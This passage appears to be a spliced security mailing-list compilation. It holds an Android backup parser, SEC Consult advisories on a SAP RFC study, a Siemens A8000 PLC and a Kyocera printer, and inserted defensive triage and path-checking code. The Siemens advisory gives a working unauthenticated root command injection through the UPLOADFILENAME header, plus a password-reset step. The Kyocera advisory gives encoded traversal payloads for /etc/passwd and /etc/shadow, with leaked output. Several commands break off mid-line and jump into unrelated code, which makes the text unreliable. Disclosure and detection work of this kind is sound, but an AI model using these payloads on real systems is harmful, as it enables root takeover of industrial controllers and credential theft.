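(format version, compressed flag "1"/"0", encryption "none" or "AES-256"),
then the payload: a tar archive, zlib-compressed when the flag is "1".
"""
import io
import tarfile
import zlib
from typing import Dict

MAGIC = b"ANDROID BACKUP\n"


def parse_ab_header(data: bytes) -> Dict[str, object]:
    """Return version, compression, encryption and where the payload starts."""
    if not data.startswith(MAGIC):
        raise ValueError("not an Android backup file")
    pos = len(MAGIC)
    fields = []
    for _ in range(3):
        nl = data.index(b"\n", pos)
        fields.append(data[pos:nl].decode("ascii"))
        pos = nl + 1
    version, compressed, encryption = fields
    return {"version": int(version), "compressed": compressed == "1",
            "encryption": encryption, "payload_offset": pos}


def ab_to_tar(data: bytes) -> bytes:
    """Return the raw tar archive carried by an unencrypted backup."""
    hdr = parse_ab_header(data)
    if hdr["encryption"] != "none":
        raise ValueError("encrypted backup (%s); the backup password is needed"
                         % hdr["encryption"])
    payload = data[hdr["payload_offset"]:]
    return zlib.decompress(payload) if hdr["compressed"] else payload


def tar_files(tar_bytes: bytes) -> Dict[str, bytes]:
    """Map member path -> content for the regular files in the archive."""
    out: Dict[str, bytes] = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tf:
        for member in tf:
            if member.isfile():
                out[member.name] = tf.extractfile(member).read()
    return out


def build_sample_ab(files: Dict[str, bytes], version: int = 5,
                    compress: bool = True) -> bytes:
    """Construct a backup in memory so the parser can be exercised offline."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:") as tf:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tf.addfile(info, io.BytesIO(content))
    body = zlib.compress(buf.getvalue()) if compress else buf.getvalue()
    return MAGIC + b"%d\n%d\nnone\n" % (version, 1 if compress else 0) + body


# Constructed sample: a shared-preferences file of the kind such a backup exposes.
SAMPLE_FILES = {
    "apps/com.example.app/sp/session.xml":
        b'<map><string name="device_token">00000000-0000-4000-8000-000000000000</string></map>',
}

if __name__ == "__main__":
    ab = build_sample_ab(SAMPLE_FILES)
    print(parse_ab_header(ab))
    for name, content in tar_files(ab_to_tar(ab)).items():
        print(name, content[:60])
```

For an app that ships `android:allowBackup="false"` the `adb backup` call produces an archive without that app's data at all, which is the cheapest check to confirm the 13.83 fix on a real device.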
[FD] SEC Consult Vulnerability Lab Whitepaper: Everyone Knows SAP®, Everyone Uses SAP, Everyone Uses RFC, No One Knows RFC: From RFC to RCE 16 Years Later
SEC Consult Vulnerability Lab Whitepaper < 20230629-0 >
===
Title: Everyone Knows SAP®, Everyone Uses SAP, Everyone Uses RFC, No One Knows RFC: From RFC to RCE 16 Years Later
Researcher: Fabian Hagg (Office Vienna)
            SEC Consult Vulnerability Lab
            An integrated part of SEC Consult, an Eviden business
            Europe | Asia
            https://www.sec-consult.com
===

In an independent analysis of the server-side implementation of the proprietary Remote Function Call (RFC) interface in SAP NetWeaver Application Server ABAP and ABAP Platform (both hereinafter referred to as AS ABAP), a set of high-impact implementation bugs and design flaws were identified by SEC Consult Vulnerability Lab security researcher and SAP security expert Fabian Hagg. Technical details about the research results are presented at the annual Troopers Security Conference 2023 in Heidelberg, Germany.

Remote Function Call (RFC) is a proprietary communication protocol required for all systems operating the SAP® Application Server for ABAP®, making it one of the most appealing targets for attacks on business-critical SAP system landscapes. With the talk "Attacking the Giants: Exploiting SAP Internals", presented by M. Nunez at Black Hat Europe 2007, the protocol reached the security research community for the first time. Since then, SAP systems have become increasingly interconnected, not only internally but also across network trust boundaries, so enterprises rely on the RFC interface technology and its codebase more than ever.

The present paper reports on an independent analysis of the protocol as it is used in SAP NetWeaver® Application Server ABAP and ABAP Platform for server-to-server communication of type '3'. Using a hybrid security testing approach that combines static and dynamic analysis techniques, the re-assessment of the RFC attack surface yielded alternate logon material, cryptographic failures, memory corruptions, and ABAP programming pitfalls.
This paper examines each of the identified vulnerabilities, demystifying somewhat forgotten inner workings of the protocol and key security mechanisms to highlight novel attack vectors and a wormable exploitation chain.

Technical whitepaper: https://r.sec-consult.com/saprfcwhite
Short blog post summary: https://r.sec-consult.com/saprfcblog
TROOPERS23 conference page: https://troopers.de/troopers23/talks/n7yuqg/

~~~
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendations about the risk profile of new technologies.
~~~
Interested in working with the experts of SEC Consult? Send us your application: https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices: https://sec-consult.com/contact/
~~~
Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] SEC Consult SA-20230703-0 :: Multiple Vulnerabilities including Unauthenticated RCE in Siemens A8000
SEC Consult Vulnerability Lab Security Advisory < 20230703-0 >
===
title: Multiple Vulnerabilities including Unauthenticated RCE
product: Siemens A8000 CP-8050 MASTER MODULE (6MF2805-0AA00)
         Siemens A8000 CP-8031 MASTER MODULE (6MF2803-1AA00)
vulnerable version: <= V04.92
fixed version: CPCI85 V05
CVE number: CVE-2023-28489, CVE-2023-33919, CVE-2023-33920, CVE-2023-33921
impact: Critical
homepage: https://www.siemens.com
found: 2023-02-15
by: Stefan Viehböck (Office Vienna)
    Christian Hager (Office Vienna)
    Steffen Robertz (Office Vienna)
    Gerhard Hechenberger (Office Vienna)
    Gorazd Jank (Office Vienna)
    Constantin Schieber-Knoebl (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult, an Eviden business
    Europe | Asia
    https://www.sec-consult.com
===

Vendor description:
---
"We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers."
Source: https://new.siemens.com/global/en/company/about.html

Business recommendation:
---
The vendor provides a patch which should be installed immediately. Customers should update to CPCI85 V05 or a later version.
(https://support.industry.siemens.com/cs/ww/en/view/109804985/)

SEC Consult highly recommends performing a thorough security review of the product, conducted by security professionals, to identify and resolve potential further security issues.

Vulnerability overview/description:
---
1) Unauthenticated Remote Code Execution (CVE-2023-28489)
By sending an HTTP request with a crafted header to port 80/443 of the PLC, arbitrary commands can be executed as the root system user. The port is used to configure and control Siemens PLCs with the Siemens Toolbox II application and is typically accessible on such devices.
2) Authenticated Command Injection (CVE-2023-33919)
Due to missing server-side input sanitization, any user with access to the SICAM WEB interface can execute arbitrary commands as user "root" on the device. This works by setting malicious parameters and starting an Ethernet packet capture.

3) Hard-coded Root Password (CVE-2023-33920)
The PLC contains a hard-coded "root" user password hash. This password hash is the same on all devices. If the corresponding password is known, it can be used to log in via UART and SSH.

4) Console Login via UART (CVE-2023-33921)
The UART interface can be accessed with physical access to the PCB. After connecting to the interface, boot information is printed and a login prompt is provided. Login as "root" user is possible after changing the hard-coded "root" password hash (see 1, 2 and 3).

Proof of concept:
---
1) Unauthenticated Remote Code Execution (CVE-2023-28489)
To exploit this vulnerability, an HTTP request including the command must be crafted. No "/" characters can be used, therefore commands are encoded as base64, e.g. "id" as "aWQ=". Note that the standard base64 alphabet itself contains "/", so an encoded command has to be checked for that character before it is used ("aWQ=" is fine). The command must be provided in the UPLOADFILENAME header. A full command looks as follows:

;echo aWQ=| base64 -d | sh #

The following header format must be obeyed:
* User-Agent: SICAM TOOLBOX II
* Session-ID: [ARBITRARY 16 CHARACTERS]
* UPLOADFILENAME: [COMMAND]

Additionally, the request body must contain the following POST parameters:
* type=20
* length=[ARBITRARY]
* data=[ARBITRARY]

A valid request can be seen below:
---
[ POC request removed ]
---

If it worked, the response body will be "type=21". Additionally, the output on the UART interface indicates code execution as the root user:
---
base64: /ies/IN/_: No such file or directory
uid=0(root) gid=0(root)
---

Subsequently, the SSH port can be opened by sending the following commands separately, each encoded as a base64 string. They will replace the default root password hash with an empty password hash, reconfigure the Dropbear SSH daemon and stop the firewall:
---
sed -i s'/:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo\/FWtDljQjCb
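As an added example for log or packet-capture review (not the advisory's removed PoC request and not Siemens code), the following Python reassembles the request shape described above from the parts the advisory gives, flags the UPLOADFILENAME injection pattern and decodes the base64 blob so an analyst sees the actual command ("id" for "aWQ="). The request path, Host and Session-ID value are assumptions; the body only follows the type/length/data format listed above.

```python
"""Triage captured HTTP requests for the SICAM TOOLBOX II upload-header
command injection (CVE-2023-28489). Added example, not Siemens code.
"""
import base64
import re
from typing import Dict, List, Tuple

SHELL_META = re.compile(r"[;|&`$]")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{2,}={0,2}")


def parse_request(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into (request line, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def decode_base64_tokens(text: str) -> List[str]:
    """Decode every token that is well-formed base64 and yields printable ASCII."""
    found: List[str] = []
    for match in B64_TOKEN.finditer(text):
        token = match.group(0)
        if len(token) % 4:                       # "base64", "sh": not a full blob
            continue
        try:
            plain = base64.b64decode(token, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):  # "echo" is valid base64 but not text
            continue
        if plain and plain.isprintable():
            found.append(plain)
    return found


def triage(raw: str) -> Dict[str, object]:
    """Flag requests matching the advisory's exploitation pattern."""
    request_line, headers, body = parse_request(raw)
    fname = headers.get("uploadfilename", "")
    reasons: List[str] = []
    if headers.get("user-agent") == "SICAM TOOLBOX II" and "uploadfilename" in headers:
        reasons.append("Toolbox II upload request (UPLOADFILENAME header present)")
    injected = SHELL_META.search(fname) is not None
    if injected:
        reasons.append("shell metacharacters in UPLOADFILENAME")
    pipeline = re.search(r"base64\s+-d|\bsh\b", fname) is not None
    if pipeline:
        reasons.append("decode-and-execute pipeline in UPLOADFILENAME")
    if "type=20" in body.split("&"):
        reasons.append("upload message type=20 in body")
    return {"request_line": request_line, "suspicious": injected or pipeline,
            "reasons": reasons, "decoded": decode_base64_tokens(fname)}


# Constructed sample requests following the header/body format above;
# path, Host and Session-ID are assumptions.
SAMPLE_EXPLOIT = (
    "POST / HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "User-Agent: SICAM TOOLBOX II\r\n"
    "Session-ID: AAAAAAAAAAAAAAAA\r\n"
    "UPLOADFILENAME: ;echo aWQ=| base64 -d | sh #\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 24\r\n"
    "\r\n"
    "type=20&length=1&data=AA"
)
SAMPLE_BENIGN = (
    "POST / HTTP/1.1\r\nHost: 192.0.2.10\r\nUser-Agent: SICAM TOOLBOX II\r\n"
    "Session-ID: AAAAAAAAAAAAAAAA\r\nUPLOADFILENAME: config.bin\r\n\r\n"
    "type=20&length=1&data=AA"
)

if __name__ == "__main__":
    for sample in (SAMPLE_EXPLOIT, SAMPLE_BENIGN):
        print(triage(sample))
```

Legitimate Toolbox II uploads also carry the User-Agent and UPLOADFILENAME header, so the verdict keys on metacharacters and the decode-and-execute pipeline in the header value, not on the header's presence.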
[FD] SEC Consult SA-20230705-0 :: Path traversal bypass & Denial of service in Kyocera TASKalfa 4053ci printer
SEC Consult Vulnerability Lab Security Advisory < 20230705-0 >
===
title: Path traversal bypass & Denial of service
product: Kyocera TASKalfa 4053ci printer
vulnerable version: TASKalfa 4053ci Version <= 2VG_S000.002.561
fixed version: 2VG_S000.002.574
CVE numbers: CVE-2023-34259, CVE-2023-34260, CVE-2023-34261
impact: High
homepage: https://global.kyocera.com
found: 2022-12-13
by: Stefan Michlits (Office Vienna)
    Gorazd Jank (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult, an Eviden business
    Europe | Asia
    https://www.sec-consult.com
===

Vendor description:
---
"Kyocera Document Solutions is leading the digital shift driving productivity and growth in the printing industry. We offer a range of exciting new options that draw on the combined resources of the Kyocera Group."
Source: https://www.kyoceradocumentsolutions.com/en/our-business/inkjet/

Business recommendation:
---
SEC Consult recommends Kyocera customers to install the latest updates. Furthermore, an in-depth security analysis performed by security professionals is highly advised, as the software may be affected by other security issues.

Vulnerability overview/description:
---
1) Path Traversal - Bypass (CVE-2023-34259)
A path traversal vulnerability was found by Hakan Eren ŞAN on 2020-06-06. The previous exploit can be found at:
https://www.exploit-db.com/exploits/48561

Kyocera has fixed that vulnerability: it was not possible to access arbitrary files using the public exploit. However, SEC Consult has found a bypass to exploit this vulnerability again and access arbitrary files. Because the web service is running as the user root, it was possible to access all files (e.g. /etc/shadow) on the device.

2) Denial-of-Service - Web Interface (CVE-2023-34260)
The denial-of-service vulnerability is related to the path traversal vulnerability. Instead of requesting a file, a directory is requested.
Once the request is sent to the web service running on TCP port 443, the web service becomes unresponsive and must be restarted.

3) User Enumeration (CVE-2023-34261)
The login function of the web service running on TCP port 443 is prone to a user enumeration vulnerability. The login function returns different responses depending on whether the username is valid or not.

Proof of concept:
---
1) Path Traversal - Bypass (CVE-2023-34259)
Previously, a security researcher discovered an unauthenticated directory traversal vulnerability in the web service running on port 443. The following payload was used to access arbitrary files:

https://IP/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm

This vulnerability is fixed in the current version; it was not possible to access arbitrary files using the above payload. However, the vulnerability was not fixed correctly, and SEC Consult identified a bypass to exploit it again. Once the ../ sequences are URL-encoded, it is possible to bypass the fix and access arbitrary files, which indicates that the check is applied to the raw request path before it is percent-decoded. The following payload can be used to access the file /etc/passwd:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm

The response containing the contents of the file /etc/passwd can be seen in the following paragraph.
---
HTTP/1.1 200 OK
Content-Length: 770
Accept-Encoding: identity
Server: KM-MFP-http/V0.0.1
Content-Type: text/html
X-Frame-Options: SAMEORIGIN

root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:1000:Linux User,,,:/var/run/sshd:/bin/false
---

Also, it was possible to access the file /etc/shadow. The following payload can be used:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%
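As an added example (not Kyocera code) of the check a correct fix needs, the following Python percent-decodes the request path before looking for traversal, handles the `%00` truncation both payloads rely on, and resolves the result against an assumed document root. The two request paths are the ones quoted in this advisory (the 2020 exploit and the URL-encoded bypass); `naive_blocked` models a filter that inspects the undecoded path and therefore catches only the first of them.

```python
"""Path-traversal check done in the right order: decode, then inspect, then
resolve against the document root. Added example, not Kyocera code.
"""
import posixpath
from typing import Dict, List
from urllib.parse import unquote

# Request paths quoted in the advisory (host part omitted).
ORIGINAL_PAYLOAD = "/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"
BYPASS_PAYLOAD = "/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm"


def naive_blocked(raw_path: str) -> bool:
    """Filter on the undecoded path: matches the 2020 exploit, misses the bypass."""
    return "../" in raw_path


def decode_path(raw_path: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable so double encoding (%252e) is resolved too."""
    cur = raw_path
    for _ in range(max_rounds):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def analyze_path(raw_path: str, docroot: str = "/var/www") -> Dict[str, object]:
    """Resolve the requested path against docroot (assumed) and list findings."""
    findings: List[str] = []
    decoded = decode_path(raw_path.split("?", 1)[0])
    if "\x00" in decoded:
        findings.append("null byte truncates the path (extension check bypass)")
        decoded = decoded.split("\x00", 1)[0]      # what a C string comparison sees
    if "\\" in decoded:
        findings.append("backslash used as path separator")
        decoded = decoded.replace("\\", "/")
    if ".." in decoded.split("/"):
        findings.append("dot-dot segment present after decoding")
    resolved = posixpath.normpath(posixpath.join(docroot, decoded.lstrip("/")))
    escapes = not (resolved == docroot or resolved.startswith(docroot + "/"))
    if escapes:
        findings.append("resolved path %s leaves %s" % (resolved, docroot))
    return {"decoded": decoded, "resolved": resolved,
            "escapes_docroot": escapes, "findings": findings,
            "allow": not findings}


if __name__ == "__main__":
    for path in (ORIGINAL_PAYLOAD, BYPASS_PAYLOAD, "/wlmeng/index.htm"):
        print(naive_blocked(path), analyze_path(path))
```

The policy rejects any `..` segment even when the resolved path stays inside the root; on a server that runs as root, as this one does, that conservatism costs nothing and removes the whole class of encoding bypasses rather than the one reported.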